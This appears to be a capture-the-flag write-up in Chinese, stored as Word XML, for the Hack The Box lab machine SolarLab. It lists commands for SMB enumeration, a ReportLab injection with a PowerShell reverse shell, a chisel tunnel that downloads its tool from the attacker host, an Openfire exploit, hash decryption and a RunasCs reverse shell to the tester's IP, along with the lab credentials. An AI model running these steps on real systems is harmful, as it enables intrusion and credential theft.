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TW"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="5177790"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3810"/>
            <wp:docPr id="1" name="圖片 1" descr="SolarL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SolarLab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eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>新增</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>solarlab.htb  report.solarlab.htb至/etc/hosts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2889250" cy="1344295"/>
            <wp:effectExtent l="0" t="0" r="6350" b="12065"/>
            <wp:docPr id="3" name="圖片 3" descr="SolarL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SolarLab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網頁沒什麼漏洞，有445 port嘗試從smb取資料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Smbclient -L 10.10.11.16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能顯示share內容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7325" cy="2357120"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5080"/>
            <wp:docPr id="2" name="圖片 2" descr="SolarLab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SolarLab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Smbclient -N </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>\\\\10.10.11.16\\Document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發現能匿名登入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get details-file.xlsx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下載excel檔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960" cy="713105"/>
            <wp:effectExtent l="0" t="0" r="5080" b="3175"/>
            <wp:docPr id="4" name="圖片 4" descr="SolarLab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SolarLab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0000" w:themeColor="text1"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> 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536315" cy="2200275"/>
            <wp:effectExtent l="0" t="0" r="14605" b="9525"/>
            <wp:docPr id="5" name="圖片 5" descr="SolarLa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SolarLa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取得user/password，嘗試登入report.solarlab.htb:6791/，發現每個嘗試都失敗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仔細研究username發現是mail名的縮寫，唯獨blake是blake.byte，猜測user名為blakeb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用blakeb/ThisCanB3typedeasily1@登入成功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869690" cy="2586355"/>
            <wp:effectExtent l="0" t="0" r="1270" b="4445"/>
            <wp:docPr id="11" name="圖片 11" descr="SolarLa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SolarLab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969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235960" cy="2485390"/>
            <wp:effectExtent l="0" t="0" r="10160" b="13970"/>
            <wp:docPr id="12" name="圖片 12" descr="SolarLa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SolarLab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596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這邊遇到4個套件，稍微玩過Leave Request發現是將html轉為PDF的套件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Google reporthub exploit只出現reportlab漏洞，POC有些相關性，嘗試使用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https://github.com/c53elyas/CVE-2023-33733/tree/master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1135" cy="3776980"/>
            <wp:effectExtent l="0" t="0" r="1905" b="2540"/>
            <wp:docPr id="13" name="圖片 13" descr="SolarLab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 descr="SolarLab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poc.py裡有system call的指令，將其改為powershell reverse shell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4785" cy="2456815"/>
            <wp:effectExtent l="0" t="0" r="8255" b="12065"/>
            <wp:docPr id="8" name="圖片 8" descr="SolarLa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SolarLab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把injection command放進leave request form-data欄位，送出後能取得shell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4633595" cy="1318260"/>
            <wp:effectExtent l="0" t="0" r="14605" b="7620"/>
            <wp:docPr id="7" name="圖片 7" descr="SolarLa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SolarLab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sudo rlwrap nc -nlvp 4444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取得shell，user為blake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055620" cy="358140"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="6" name="圖片 6" descr="SolarLab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SolarLab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取得user flag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246120" cy="358140"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="22" name="圖片 22" descr="SolarLab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SolarLab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嘗試用winpeas掃，但跑不動，手動找port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netstat -ano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發現本地9090、9091 port有開，可能有openfire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1610" cy="589280"/>
            <wp:effectExtent l="0" t="0" r="11430" b="5080"/>
            <wp:docPr id="21" name="圖片 21" descr="SolarLab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 descr="SolarLab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kali端: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./chisel server -port 7777 --reverse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靶機端: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載windows chisel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iwr -Uri http://10.10.14.12/chisel_1.9.1_windows_amd64 -Outfile chisel.exe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.\chisel.exe client 10.10.14.12:7777 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091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4310" cy="2475865"/>
            <wp:effectExtent l="0" t="0" r="13970" b="8255"/>
            <wp:docPr id="20" name="圖片 20" descr="SolarLab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SolarLab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發現openfire介面，是一個登入系統，版本為4.7.4，有漏洞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7960" cy="3897630"/>
            <wp:effectExtent l="0" t="0" r="5080" b="3810"/>
            <wp:docPr id="19" name="圖片 19" descr="SolarLab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SolarLab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git clone https://github.com/miko550/CVE-2023-32315.git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cd CVE-2023-32315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pip3 install -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 CVE-2023-32315.py -t </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>http://127.0.0.1:9090</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>得出username和password (4zw88v/02rdso) #會改變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5420" cy="2088515"/>
            <wp:effectExtent l="0" t="0" r="7620" b="14605"/>
            <wp:docPr id="18" name="圖片 18" descr="SolarLab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SolarLab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登入後能在plugins頁面發現能上傳plugins，上傳github附帶的plugins漏洞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1610" cy="2353945"/>
            <wp:effectExtent l="0" t="0" r="11430" b="8255"/>
            <wp:docPr id="17" name="圖片 17" descr="SolarLab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SolarLab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在server setting頁面用密碼123登入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2880" cy="1723390"/>
            <wp:effectExtent l="0" t="0" r="10160" b="13970"/>
            <wp:docPr id="16" name="圖片 16" descr="SolarLab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SolarLab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切換至system command並用powershell reverse shell反彈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4686935" cy="1310640"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="15" name="圖片 15" descr="SolarLab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 descr="SolarLab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得到user為openfire的shell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71770" cy="116840"/>
            <wp:effectExtent l="0" t="0" r="1270" b="5080"/>
            <wp:docPr id="14" name="圖片 14" descr="SolarLab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SolarLab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在C:\Program Files\Openfire\embedded-db\openfire.script發現administrator的hash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2308860" cy="205740"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="10" name="圖片 10" descr="SolarLa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 descr="SolarLab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以及salt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4785" cy="327025"/>
            <wp:effectExtent l="0" t="0" r="8255" b="8255"/>
            <wp:docPr id="9" name="圖片 9" descr="SolarLab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 descr="SolarLab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git clone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>https://github.com/c0rdis/openfire_decrypt.git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由於openfire加密特殊，從github上解密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java OpenFireDecryptPass.java becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn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得出密碼為ThisPasswordShouldDo!@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5264150" cy="934720"/>
            <wp:effectExtent l="0" t="0" r="8890" b="10160"/>
            <wp:docPr id="24" name="圖片 24" descr="SolarLab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 descr="SolarLab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上傳RunasCs.exe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.\RunasCs.exe Administrator ThisPasswordShouldDo!@ powershell -r 10.10.14.43:4321</w:t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>回彈shell至kali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pP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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3825875" cy="510540"/>
            <wp:effectExtent l="0" t="0" r="14605" b="7620"/>
            <wp:docPr id="23" name="圖片 23" descr="SolarLab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 descr="SolarLab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875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TW"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve">取得root </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>flag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細明體">
    <w:panose1 w:val="02020509000000000000"/>
    <w:charset w:val="88"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="default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0714AA"/>
    <w:rsid w:val="068C7F60"/>
    <w:rsid w:val="07746C81"/>
    <w:rsid w:val="08460EBE"/>
    <w:rsid w:val="091D7FEF"/>
    <w:rsid w:val="0E762592"/>
    <w:rsid w:val="0FCD4B3A"/>
    <w:rsid w:val="145C6F1D"/>
    <w:rsid w:val="18E11CFC"/>
    <w:rsid w:val="18EF149C"/>
    <w:rsid w:val="1AA357AE"/>
    <w:rsid w:val="1D60090D"/>
    <w:rsid w:val="1DDF1755"/>
    <w:rsid w:val="21E3145F"/>
    <w:rsid w:val="25E721FD"/>
    <w:rsid w:val="275A4DF7"/>
    <w:rsid w:val="275F054E"/>
    <w:rsid w:val="27BD53ED"/>
    <w:rsid w:val="2BD1371D"/>
    <w:rsid w:val="2C7C2DA6"/>
    <w:rsid w:val="2E354063"/>
    <w:rsid w:val="2F86277E"/>
    <w:rsid w:val="326F529B"/>
    <w:rsid w:val="34345806"/>
    <w:rsid w:val="386F4C42"/>
    <w:rsid w:val="3A455FF5"/>
    <w:rsid w:val="3A873C03"/>
    <w:rsid w:val="3B361218"/>
    <w:rsid w:val="3D7F540C"/>
    <w:rsid w:val="3E182DA4"/>
    <w:rsid w:val="40BE4D88"/>
    <w:rsid w:val="489C03A3"/>
    <w:rsid w:val="4A181004"/>
    <w:rsid w:val="4BDD33FA"/>
    <w:rsid w:val="4C016EBD"/>
    <w:rsid w:val="4E431D1A"/>
    <w:rsid w:val="53602A4C"/>
    <w:rsid w:val="539E61EC"/>
    <w:rsid w:val="582E020B"/>
    <w:rsid w:val="5AE846CE"/>
    <w:rsid w:val="5CB9496C"/>
    <w:rsid w:val="5CC20BB8"/>
    <w:rsid w:val="62590D45"/>
    <w:rsid w:val="6C0C0FF7"/>
    <w:rsid w:val="6DDC6F8E"/>
    <w:rsid w:val="6EF71FA7"/>
    <w:rsid w:val="6F0D74E5"/>
    <w:rsid w:val="709D6314"/>
    <w:rsid w:val="71472204"/>
    <w:rsid w:val="75F1779F"/>
    <w:rsid w:val="78E77277"/>
    <w:rsid w:val="7A7A0AB8"/>
    <w:rsid w:val="7FF057FD"/>
  </w:rsids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Office_10.8.0.6003_F1E327BC-269C-435d-A152-05C5408002CA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ACER</dc:creator>
  <cp:lastModifiedBy>ACER</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-04T03:52:39Z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1028-10.8.0.6003</vt:lpwstr>
  </property>
</Properties>
</file>